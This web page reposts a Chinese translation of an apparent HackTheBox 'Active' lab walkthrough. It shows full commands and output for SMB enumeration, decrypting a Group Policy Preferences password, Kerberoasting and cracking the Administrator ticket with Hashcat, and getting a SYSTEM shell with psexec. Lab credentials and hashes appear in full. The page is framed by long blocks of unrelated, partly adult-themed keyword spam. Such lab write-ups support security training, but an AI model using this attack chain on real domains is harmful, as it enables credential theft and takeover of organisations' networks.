国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

活動目錄下的常見攻擊方式
2019-01-13   4hou

Active是一個很簡單的box,不過也提供了很多學習的機會。這個box包含了很多與Windows活動目錄相關的常見漏洞。你可以在這個box中進行SMB枚舉,這是一個不錯的練習機會。你也可以對Windows域使用kerberoasting,但如果你不是滲透測試員的話,是沒有機會這么做的。

Box詳情

偵察

  • Nmap

  • SMB

-SMB枚舉

-列出共享

共享復制-SMB

  • 遍歷

  • GPP密碼

  • 破解GPP密碼

用戶共享-SMB

Kerberoasting

  • 背景

  • 獲取哈希

  • 使用Hashcat破解

管理員權限

  • 共享遍歷

  • 獲取root.txt

  • System shell

Box詳情:

偵察

Nmap

Nmap結果顯示這是一臺Windows 2008 R2服務器,而且是活動目錄域控。


  1. root@kali:~/hackthebox/active-10.10.10.100# nmap -sT -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.100 

  2. Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 21:35 EDT 

  3. Nmap scan report for 10.10.10.100                            

  4. Host is up (0.020s latency).                                                                                               

  5. Not shown: 65512 closed ports  

  6. PORT      STATE SERVICE    

  7. 53/tcp    open  domain 

  8. 88/tcp    open  kerberos-sec 

  9. 135/tcp   open  msrpc 

  10. 139/tcp   open  netbios-ssn 

  11. 389/tcp   open  ldap 

  12. 445/tcp   open  microsoft-ds 

  13. 464/tcp   open  kpasswd5 

  14. 593/tcp   open  http-rpc-epmap              

  15. 636/tcp   open  ldapssl                                         

  16. 3268/tcp  open  globalcatLDAP 

  17. 3269/tcp  open  globalcatLDAPssl                     

  18. 5722/tcp  open  msdfsr                               

  19. 9389/tcp  open  adws 

  20. 47001/tcp open  winrm 

  21. 49152/tcp open  unknown 

  22. 49153/tcp open  unknown                              

  23. 49154/tcp open  unknown 

  24. 49155/tcp open  unknown 

  25. 49157/tcp open  unknown 

  26. 49158/tcp open  unknown 

  27. 49169/tcp open  unknown 

  28. 49170/tcp open  unknown 

  29. 49179/tcp open  unknown 

  30.                                                                                              

  31. Nmap done: 1 IP address (1 host up) scanned in 13.98 seconds 

  32.  

  33. root@kali:~/hackthebox/active-10.10.10.100# nmap -sV -sC -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152-49158,49169,49170,49179 --min-rate 5 

  34. 000 -oA nmap/scripts 10.10.10.100                    

  35. Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 21:37 EDT 

  36. Nmap scan report for 10.10.10.100                                                                                                                                 

  37. Host is up (0.020s latency).                

  38.                         

  39. PORT      STATE  SERVICE       VERSION                                                         

  40. 53/tcp    open   domain        Microsoft DNS 6.1.7600 (1DB04001) (Windows Server 2008 R2) 

  41. | dns-nsid: 

  42. |_  bind.version: Microsoft DNS 6.1.7600 (1DB04001) 

  43. 88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2018-07-29 01:37:17Z) 

  44. 135/tcp   open   msrpc         Microsoft Windows RPC 

  45. 139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn 

  46. 389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name

  47. 445/tcp   open   microsoft-ds? 

  48. 464/tcp   open   kpasswd5? 

  49. 593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0 

  50. 636/tcp   open   tcpwrapped 

  51. 3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name

  52. 3269/tcp  open   tcpwrapped 

  53. 5722/tcp  open   msrpc         Microsoft Windows RPC 

  54. 9389/tcp  open   mc-nmf        .NET Message Framing 

  55. 47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 

  56. |_http-server-header: Microsoft-HTTPAPI/2.0 

  57. |_http-title: Not Found 

  58. 49152/tcp open   msrpc         Microsoft Windows RPC 

  59. 49153/tcp open   msrpc         Microsoft Windows RPC 

  60. 49154/tcp open   msrpc         Microsoft Windows RPC 

  61. 49155/tcp open   msrpc         Microsoft Windows RPC 

  62. 49156/tcp closed unknown 

  63. 49157/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0 

  64. 49158/tcp open   msrpc         Microsoft Windows RPC 

  65. 49169/tcp open   msrpc         Microsoft Windows RPC 

  66. 49170/tcp open   msrpc         Microsoft Windows RPC 

  67. 49179/tcp open   msrpc         Microsoft Windows RPC 

  68. Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2, cpe:/o:microsoft:windows 

  69.  

  70. Host script results: 

  71. |_clock-skew: mean: -35s, deviation: 0s, median: -35s 

  72. |_nbstat: NetBIOS name: DC, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:a2:16:8b (VMware) 

  73. | smb2-security-mode: 

  74. |   2.02: 

  75. |_    Message signing enabled and required 

  76. | smb2-time

  77. |   date: 2018-07-28 21:38:11 

  78. |_  start_date: 2018-07-28 15:00:50 

  79.  

  80. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 

  81. Nmap done: 1 IP address (1 host up) scanned in 150.56 seconds 

  82.  

  83. root@kali:~/hackthebox/active-10.10.10.100# nmap -sU -p- --min-rate 5000 -oA nmap/alludp 10.10.10.100 

  84. Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 21:40 EDT 

  85. Warning: 10.10.10.100 giving up on port because retransmission cap hit (10). 

  86. Nmap scan report for 10.10.10.100 

  87. Host is up (0.021s latency). 

  88. Not shown: 65385 open|filtered ports, 145 closed ports 

  89. PORT      STATE SERVICE 

  90. 123/udp   open  ntp 

  91. 137/udp   open  netbios-ns 

  92. 49413/udp open  unknown 

  93. 49616/udp open  unknown 

  94. 65096/udp open  unknown 

SMB-TCP 139/445

SMB遍歷

如果是一臺Windows主機,那么我會看看SMB。一般我都會使用多種工具來對主機進行SMB遍歷。我還寫了一篇博客,講解各種SMB遍歷的工具。然后lppsec又告訴我一個工具smbmap,那會兒我剛寫完那篇博客,剛剛更新完SMB枚舉checklist,不過我又去編輯那篇博客,添加了smbmap這個工具的使用原理和使用步驟。

列出共享

我剛開始使用enum4linux這個工具進行了枚舉,但是這個工具有個問題,它dump了一堆信息,不過大多時候,這些信息都沒什么用。返回來的信息都很難理解,下面是輸出結果中比較有用的部分:


  1. root@kali:/opt/ad-ldap-enum# enum4linux -a 10.10.10.100 

  2. ...[snip]... 

  3.  ========================================= 

  4. |    Share Enumeration on 10.10.10.100    | 

  5.  ========================================= 

  6.  

  7.         Sharename       Type      Comment 

  8.         ---------       ----      ------- 

  9.         ADMIN$          Disk      Remote Admin 

  10.         C$              Disk      Default share 

  11.         IPC$            IPC       Remote IPC 

  12.         NETLOGON        Disk      Logon server share 

  13.         Replication     Disk 

  14.         SYSVOL          Disk      Logon server share 

  15.         Users           Disk 

  16. Reconnecting with SMB1 for workgroup listing. 

  17. Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) 

  18. Failed to connect with SMB1 -- no workgroup available 

  19.  

  20. [+] Attempting to map shares on 10.10.10.100 

  21. //10.10.10.100/ADMIN$   Mapping: DENIED, Listing: N/A 

  22. //10.10.10.100/C$       Mapping: DENIED, Listing: N/A 

  23. //10.10.10.100/IPC$     Mapping: OK     Listing: DENIED 

  24. //10.10.10.100/NETLOGON Mapping: DENIED, Listing: N/A 

  25. //10.10.10.100/Replication      Mapping: OK, Listing: OK 

  26. //10.10.10.100/SYSVOL   Mapping: DENIED, Listing: N/A 

  27. //10.10.10.100/Users    Mapping: DENIED, Listing: N/A 

  28. ...[snip]... 

而smbmap工具的輸出結果就非常清楚,一目了然,如圖所示,還顯示了我們不經認證就有Replication Share的讀取權限


  1. root@kali:~/hackthebox/active-10.10.10.100# smbmap -H 10.10.10.100 

  2. [+] Finding open SMB ports.... 

  3. [+] User SMB session establishd on 10.10.10.100... 

  4. [+] IP: 10.10.10.100:445        Name: 10.10.10.100                                       

  5.         Disk                                                    Permissions 

  6.         ----                                                    ----------- 

  7.         ADMIN$                                                  NO ACCESS 

  8.         C$                                                      NO ACCESS 

  9.         IPC$                                                    NO ACCESS 

  10.         NETLOGON                                                NO ACCESS 

  11.         Replication                                             READ ONLY 

  12.         SYSVOL                                                  NO ACCESS 

  13.         Users                                                   NO ACCESS 

Replication share –SMB

枚舉

因為我可以不用密碼就直接訪問\\10.10.10.100\Replication,我將使用smbclient來連接并查看一番。


  1. root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/Replication -U ""%"" 

  2. Try "help" to get a list of possible commands.                             

  3. smb: \> 

或者,我也可以使用smbmap來遞歸列出share中的所有文件,命令如下:


  1. smbmap -H 10.10.10.100 -R 

哪種方法都行,我注意到了一個很有意思的文件Groups.xml,內容如下:


  1. smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls 
  2.   .                                   D        0  Sat Jul 21 06:37:44 2018 
  3.   ..                                  D        0  Sat Jul 21 06:37:44 2018 
  4.   Groups.xml                          A      533  Wed Jul 18 16:46:06 2018 

它有username和cpassword字段:


  1. <?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"
  2.   <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"
  3.     <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/> 
  4.   </User></Groups> 

GPP密碼

只要創建了一個新的GPP(組策略首選項),都會在SYSVOL share中創建一個數據配置的xml文件,包括任何與GPP相關的密碼。不過,為了安全起見,在存儲之前,Microsoft AES對密碼進行了加密處理。但是,Microsoft又在MSDN上發布了秘鑰。

微軟在2014年發布了一個補丁,防止管理員將密碼寫入GPP。但是這個補丁對于那些已存在的可破解的密碼不起任何作用。而且據我所知,滲透測試員在2018年也經常能夠發現這些秘鑰。更多詳情,請看這篇博客:AD security。

破解GPP密碼

既然得到了秘鑰,我們就可以進行破解了。Kali上有一個工具gpp-decrypt可以破解:


  1. root@kali:~/hackthebox/active-10.10.10.100/smb-loot# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ 
  2. GPPstillStandingStrong2k18 

用戶共享-SMB

有了用戶名和密碼,我又能多訪問3個share了。


  1. root@kali:~/hackthebox/active-10.10.10.100/smb-loot# smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 
  2. [+] Finding open SMB ports.... 
  3. [+] User SMB session establishd on 10.10.10.100... 
  4. [+] IP: 10.10.10.100:445    Name: 10.10.10.100                                       
  5.         Disk                  Permissions 
  6.         ----                  ----------- 
  7.         ADMIN$                 NO ACCESS 
  8.         C$                    NO ACCESS 
  9.         IPC$                   NO ACCESS 
  10.         NETLOGON                READ ONLY 
  11.         Replication               READ ONLY 
  12.         SYSVOL                 READ ONLY 
  13.         Users                  READ ONLY 

當我連接到用戶共享時,看起來有點像是C:\Users\目錄,事實上就是這個目錄:


  1. root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18                                                                                                          
  2. Try "help" to get a list of possible commands. 
  3. smb: \> dir 
  4.   .           DR        0  Sat Jul 21 10:39:20 2018 
  5.   ..           DR        0  Sat Jul 21 10:39:20 2018 
  6.   Administrator     D         0  Mon Jul 16 06:14:21 2018 
  7.   All Users       DHS        0  Tue Jul 14 01:06:44 2009 
  8.   Default        DHR        0  Tue Jul 14 02:38:21 2009 
  9.   Default User     DHS        0  Tue Jul 14 01:06:44 2009 
  10.   desktop.ini      AHS        174  Tue Jul 14 00:57:55 2009 
  11.   Public         DR        0  Tue Jul 14 00:57:55 2009 
  12.   SVC_TGS         D         0  Sat Jul 21 11:16:32 2018 
  13.  
  14.       10459647 blocks of size 4096. 6308502 blocks available 

這樣一來,我們就有足夠的權限來訪問user.txt文件了。


  1. smb: \SVC_TGS\desktop\> get user.txt 
  2. getting file \SVC_TGS\desktop\user.txt of size 34 as user.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec) 
  3. root@kali:~/hackthebox/active-10.10.10.100# cat user.txt 
  4. 86d67d8b... 

Kerberoasting

背景

Kerberos是Windows活動目錄環境中用于身份認證的協議(當然它也可以用于Linux主機的身份認證)。2014年,Tim Medin演示了對kerberos的攻擊,他把這種攻擊叫做kerberoasting。這個演示非常值得一看,因為Tim用了圖文并茂的方式闡述了攻擊過程。這里我會嘗試簡單回顧一下。

如果你要使用Kerberos對某些服務進行身份驗證,你需要聯系DC并告訴它要對哪個系統服務進行身份驗證。它會使用服務用戶的密碼哈希對response進行加密然后返回給你。你再把該response發送給服務,該服務可以使用密碼對其進行解密,檢查你的身份,并確定是否允許你進入。

在Kerberoasting攻擊中,你不會將encrypted ticket從DC發送到服務,而是使用離線暴力來破解與服務相關的密碼。

獲取哈希

我將使用IMpacket工具中的GetUserSPNs.py腳本來獲取與普通用戶帳戶關聯的服務用戶名列表。它也會得到一個我可以破解的ticket。

該腳本跑完之后識別出了一個用戶,而且是管理員:


  1. root@kali:~/hackthebox/active-10.10.10.100# GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out 
  2. Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies 
  3.  
  4. Password
  5. ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon            
  6. --------------------  -------------  --------------------------------------------------------  -------------------  ------------------- 
  7. active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2018-07-21 11:05:53 

它也返回了一個ticket,我就可以嘗試暴力破解來得到用戶的密碼:


  1. root@kali:~/hackthebox/active-10.10.10.100# cat GetUserSPNs.out  
  2. $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f37607953ce9fd6c9060de4aece5$55e2d21e37623a43d8cd5e36e39bfaffc52abead3887ca728d527874107ca042e0e9283ac478b1c91cab58c9184828e7a5e0af452ad2503e463ad2088ba97964f65ac10959a3826a7f99d2d41e2a35c5a2c47392f160d65451156893242004cb6e3052854a9990bac4deb104f838f3e50eca3ba770fbed089e1c91c513b7c98149af2f9a994655f5f13559e0acb003519ce89fa32a1dd1c8c7a24636c48a5c948317feb38abe54f875ffe259b6b25a63007798174e564f0d6a09479de92e6ed98f0887e19b1069b30e2ed8005bb8601faf4e476672865310c6a0ea0bea1ae10caff51715aea15a38fb2c1461310d99d6916445d7254f232e78cf9288231e436ab457929f50e6d4f70cbfcfd2251272961ff422c3928b0d702dcb31edeafd856334b64f74bbe486241d752e4cf2f6160b718b87aa7c7161e95fab757005e5c80254a71d8615f4e89b0f4bd51575cc370e881a570f6e5b71dd14f50b8fd574a04978039e6f32d108fb4207d5540b4e58df5b8a0a9e36ec2d7fc1150bb41eb9244d96aaefb36055ebcdf435a42d937dd86b179034754d2ac4db28a177297eaeeb86c229d0f121cf04b0ce32f63dbaa0bc5eafd47bb97c7b3a14980597a9cb2d83ce7c40e1b864c3b3a77539dd78ad41aceb950a421a707269f5ac25b27d5a6b7f334d37acc7532451b55ded3fb46a4571ac27fc36cfad031675a85e0055d31ed154d1f273e18be7f7bc0c810f27e9e7951ccc48d976f7fa66309355422124ce6fda42f9df406563bc4c20d9005ba0ea93fac71891132113a15482f3d952d54f22840b7a0a6000c8e8137e04a898a4fd1d87739bf5428d748086f0166b35c181729cc62b41ba6a9157333bb77c9e03dc9ac23782cf5dcebd11faad8ca3e3e74e25f21dc04ba9f1703bd51d100051c8f505cc8085056b94e349b57906ee8deaf026b3daa89e7c3fc747a6a31ae08376da259f3118370bef86b6e7c2f88d66400eccb122dec8028223f6dcde29ffaa5b83ecb1c3780a782a5797c527a26a7b51b62db3e4865ebc2a0a0d2c931550decb3e7ae581b59f070dd33e423a90ec2ef66982a1b6336afe968fa93f5dd2880a313dc05d4e5cf104b6d9a8316b9fe3dc16e057e0f5c835e111ab92795fb0033541916a57df8f8e6b8cc25ecff2775282ccee110c49376c2cec6b7bb95c265f1466994da89e69605594ead28d24212a137ee20197d8aa95f243c347e02616f40f4071c33f749f5b94d1259fd32174 

使用Hashcat破解

我會在這個網址查找哈希類型,然后使用Hashcat進行破解:


  1. ~/Dropbox/CTFs/hackthebox/active-10.10.10.100$ hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force                                        
  2. hashcat (v4.0.1) starting...  
  3. ...snip... 
  4. $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f37607953ce9fd6c9060de4aece5$55e2d21e37623a43d8cd5e36e39bfaffc52abead3887ca728d527874107ca042e0e9283ac478b1c91cab58c9 
  5. 184828e7a5e0af452ad2503e463ad2088ba97964f65ac10959a3826a7f99d2d41e2a35c5a2c47392f160d65451156893242004cb6e3052854a9990bac4deb104f838f3e50eca3ba770fbed089e1c91c513b7c98149af2f9a 
  6. 994655f5f13559e0acb003519ce89fa32a1dd1c8c7a24636c48a5c948317feb38abe54f875ffe259b6b25a63007798174e564f0d6a09479de92e6ed98f0887e19b1069b30e2ed8005bb8601faf4e476672865310c6a0ea0b 
  7. ea1ae10caff51715aea15a38fb2c1461310d99d6916445d7254f232e78cf9288231e436ab457929f50e6d4f70cbfcfd2251272961ff422c3928b0d702dcb31edeafd856334b64f74bbe486241d752e4cf2f6160b718b87aa 
  8. 7c7161e95fab757005e5c80254a71d8615f4e89b0f4bd51575cc370e881a570f6e5b71dd14f50b8fd574a04978039e6f32d108fb4207d5540b4e58df5b8a0a9e36ec2d7fc1150bb41eb9244d96aaefb36055ebcdf435a42d 
  9. 937dd86b179034754d2ac4db28a177297eaeeb86c229d0f121cf04b0ce32f63dbaa0bc5eafd47bb97c7b3a14980597a9cb2d83ce7c40e1b864c3b3a77539dd78ad41aceb950a421a707269f5ac25b27d5a6b7f334d37acc7 
  10. 532451b55ded3fb46a4571ac27fc36cfad031675a85e0055d31ed154d1f273e18be7f7bc0c810f27e9e7951ccc48d976f7fa66309355422124ce6fda42f9df406563bc4c20d9005ba0ea93fac71891132113a15482f3d952 
  11. d54f22840b7a0a6000c8e8137e04a898a4fd1d87739bf5428d748086f0166b35c181729cc62b41ba6a9157333bb77c9e03dc9ac23782cf5dcebd11faad8ca3e3e74e25f21dc04ba9f1703bd51d100051c8f505cc8085056b 
  12. 94e349b57906ee8deaf026b3daa89e7c3fc747a6a31ae08376da259f3118370bef86b6e7c2f88d66400eccb122dec8028223f6dcde29ffaa5b83ecb1c3780a782a5797c527a26a7b51b62db3e4865ebc2a0a0d2c931550de 
  13. cb3e7ae581b59f070dd33e423a90ec2ef66982a1b6336afe968fa93f5dd2880a313dc05d4e5cf104b6d9a8316b9fe3dc16e057e0f5c835e111ab92795fb0033541916a57df8f8e6b8cc25ecff2775282ccee110c49376c2c 
  14. ec6b7bb95c265f1466994da89e69605594ead28d24212a137ee20197d8aa95f243c347e02616f40f4071c33f749f5b94d1259fd32174:Ticketmaster1968 

管理員權限

Share枚舉

現在,有了管理員的密碼,我們幾乎可以訪問所有的shares,包括C$,這會提供整個文件系統:


  1. root@kali:~/hackthebox/active-10.10.10.100/smb-loot# smbmap -H 10.10.10.100 -d active.htb -u administrator -p Ticketmaster1968 
  2. [+] Finding open SMB ports.... 
  3. [+] User SMB session establishd on 10.10.10.100... 
  4. [+] IP: 10.10.10.100:445        Name: 10.10.10.100                                       
  5.         Disk                                                    Permissions 
  6.         ----                                                    ----------- 
  7.         ADMIN$                                                  READ, WRITE 
  8.         C$                                                      READ, WRITE 
  9.         IPC$                                                    NO ACCESS 
  10.         NETLOGON                                                READ, WRITE 
  11.         Replication                                             READ ONLY 
  12.         SYSVOL                                                  READ, WRITE 
  13.         [!] Unable to remove test directory at \\10.10.10.100\SYSVOL\vnCfhEJMWA, plreae remove manually 
  14.         Users                                                   READ ONLY 

獲取root.txt

我可以使用smbclient或者smbmap來進行連接并獲取root.txt文件:


  1. root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/C$ -U active.htb\\administrator%Ticketmaster1968 
  2. Try "help" to get a list of possible commands. 
  3. smb: \> get \users\administrator\desktop\root.txt 
  4. getting file \users\administrator\desktop\root.txt of size 34 as \users\administrator\desktop\root.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec) 
  5.  
  6. root@kali:~/hackthebox/active-10.10.10.100# cat root.txt 
  7. b5fc76d1... 

這里值得注意的是,我甚至沒有獲取系統的shell就拿到了系統中的root flag。

System shell

但我當然想getshell。現在這些shares是可寫的,而且我有管理員權限,我可以使用PSExec來getshell。直接在kali上就有很多方法進行提權,這里我還是使用Impacket這個工具,使用psexec.py這個腳本:


  1. root@kali:~/hackthebox/active-10.10.10.100# psexec.py active.htb/administrator@10.10.10.100 
  2. Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies 
  3.  
  4. Password
  5. [*] Requesting shares on 10.10.10.100..... 
  6. [*] Found writable share ADMIN$ 
  7. [*] Uploading file dMCaaHzA.exe 
  8. [*] Opening SVCManager on 10.10.10.100..... 
  9. [*] Creating service aYMa on 10.10.10.100..... 
  10. [*] Starting service aYMa..... 
  11. [!] Press help for extra shell commands 
  12. Microsoft Windows [Version 6.1.7601] 
  13. Copyright (c) 2009 Microsoft Corporation.  All rights reserved. 
  14.  
  15. C:\Windows\system32>whoami 
  16. nt authority\system 

熱詞搜索:

上一篇:網絡安全攻防技術:移動安全篇
下一篇:車聯網時代,傳統車廠該向互聯網產品經理們學習什么?

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
免费观看成人| 欧美精品91| 日韩视频免费观看高清在线视频| 在线视频成人| 亚洲午夜高清视频| 久久九九热re6这里有精品| 欧美好吊妞视频| 国产日韩一区二区| 999亚洲国产精| 久久亚洲国产精品一区二区| 欧美日韩一区高清| 黑丝一区二区| 香蕉久久a毛片| 欧美日韩精品一区二区在线播放 | 欧美黄色影院| 国产亚洲激情| 午夜欧美不卡精品aaaaa| 欧美日产一区二区三区在线观看| 国产一区二区三区视频在线观看 | 国产亚洲精品美女| 亚洲午夜激情免费视频| 欧美黄色免费网站| 在线观看亚洲专区| 麻豆9191精品国产| 好吊视频一区二区三区四区| 午夜精品久久久| 欧美日韩天堂| 亚洲视频免费在线| 亚洲激情在线观看| 欧美日韩爆操| 久久爱www久久做| 一区二区欧美精品| 国产麻豆综合| 国内精品视频一区| 久久久xxx| 91久久综合| 欧美精品久久久久久久| 午夜精品福利一区二区蜜股av| 久久se精品一区二区| 欧美日韩免费一区二区三区视频 | 亚洲免费久久| 久久久国产精品亚洲一区| 亚洲国产精品成人| 久久久精品网| 国产午夜精品视频| 久久精品国产999大香线蕉| 国产精品毛片在线| 午夜在线精品| 国产一区二区黄色| 久久国产福利| 一区二区亚洲精品国产| 美女视频一区免费观看| 日韩视频中文字幕| 国产精品免费一区二区三区在线观看| 亚洲一区精品视频| 国产视频在线观看一区| 欧美高清一区二区| 亚洲女人天堂av| 国产亚洲精品高潮| 欧美日韩1区| 亚洲欧美激情视频| 亚洲国产日韩在线一区模特| 欧美视频中文字幕| 久久亚洲私人国产精品va| 一本久久综合亚洲鲁鲁五月天| 国产美女一区二区| 欧美国产综合视频| 久久不见久久见免费视频1| 日韩视频国产视频| 韩国一区电影| 国产精品日韩精品欧美在线| 牛牛精品成人免费视频| 午夜一区不卡| 日韩一级在线观看| 1024成人网色www| 国产欧美日韩中文字幕在线| 欧美高清在线一区二区| 欧美亚洲视频| 亚洲午夜激情| 99精品视频免费观看| 亚洲第一精品夜夜躁人人爽| 国产欧美日韩精品一区| 欧美午夜无遮挡| 欧美激情亚洲激情| 久久青草久久| 久久精品72免费观看| 午夜精品剧场| 亚洲欧美日本国产专区一区| 9人人澡人人爽人人精品| 亚洲激情综合| 亚洲高清自拍| 亚洲高清在线观看| 亚洲第一狼人社区| 亚洲第一在线| 亚洲激情六月丁香| 91久久精品美女| 亚洲国产精品久久久久秋霞影院 | 欧美精品v日韩精品v国产精品 | 欧美视频日韩| 欧美国产日韩亚洲一区| 欧美a级片网站| 玖玖精品视频| 久久夜色精品国产| 玖玖精品视频| 蜜臀91精品一区二区三区| 久热精品视频在线观看一区| 久久国产精品久久久| 亚欧成人在线| 久久亚洲春色中文字幕久久久| 久久福利毛片| 裸体一区二区三区| 欧美精品观看| 欧美日韩精品伦理作品在线免费观看| 欧美成人首页| 欧美午夜大胆人体| 国产精品青草综合久久久久99| 国产精品视频一区二区三区| 国产精品麻豆欧美日韩ww| 国产精品日韩精品| 一区二区亚洲欧洲国产日韩| 亚洲福利专区| 中日韩美女免费视频网址在线观看| 国产精品99久久99久久久二8 | 国产欧美日本一区二区三区| 国产精品一区一区| 狠狠狠色丁香婷婷综合激情| 亚洲第一中文字幕| 一区二区欧美日韩| 欧美一站二站| 免费不卡欧美自拍视频| 欧美日韩理论| 国产欧美精品| 亚洲高清在线| 亚洲欧美成人一区二区在线电影| 久久国产精品黑丝| 欧美精品一二三| 国产一区二区久久| 亚洲精品在线视频| 欧美一区二区三区四区在线观看| 另类酷文…触手系列精品集v1小说| 欧美国产视频日韩| 国产区精品在线观看| 在线看国产日韩| 亚洲自拍高清| 免费久久久一本精品久久区| 国产精品男gay被猛男狂揉视频| 亚洲电影观看| 性欧美长视频| 欧美日韩中文在线| 亚洲福利视频一区| 性18欧美另类| 欧美日韩精品免费观看视频| 国产一区日韩二区欧美三区| 一区二区三区四区五区在线| 免费观看成人www动漫视频| 欧美日韩亚洲免费| 亚洲福利电影| 久久久久.com| 国产欧美一区二区精品秋霞影院| 日韩视频一区二区三区| 久久亚洲二区| 国产日韩精品一区二区浪潮av| 99re热这里只有精品视频| 欧美在线观看网站| 国产麻豆午夜三级精品| 一片黄亚洲嫩模| 欧美精品久久99久久在免费线| 好男人免费精品视频| 欧美一进一出视频| 国产亚洲欧美激情| 午夜免费电影一区在线观看| 欧美视频久久| 中文久久精品| 欧美视频在线播放| 亚洲视频在线视频| 欧美丝袜一区二区三区| 亚洲精品日韩在线观看| 欧美国产极速在线| 亚洲人成网在线播放| 欧美日韩国产色综合一二三四| 亚洲欧洲日本专区| 欧美精品日韩综合在线| 99精品免费视频| 中文欧美在线视频| 国产精品亚洲视频| 欧美在线免费播放| 国产一区欧美| 麻豆成人小视频| 日韩天堂在线视频| 国产精品国产自产拍高清av| 亚洲一级在线观看| 国产精品专区一| 欧美一区二区观看视频| 在线观看成人av电影| 欧美激情一区二区三区在线视频观看 | 久久国内精品自在自线400部| 国产婷婷色一区二区三区四区| 欧美一区二区三区四区视频| 国内外成人免费激情在线视频| 玖玖在线精品|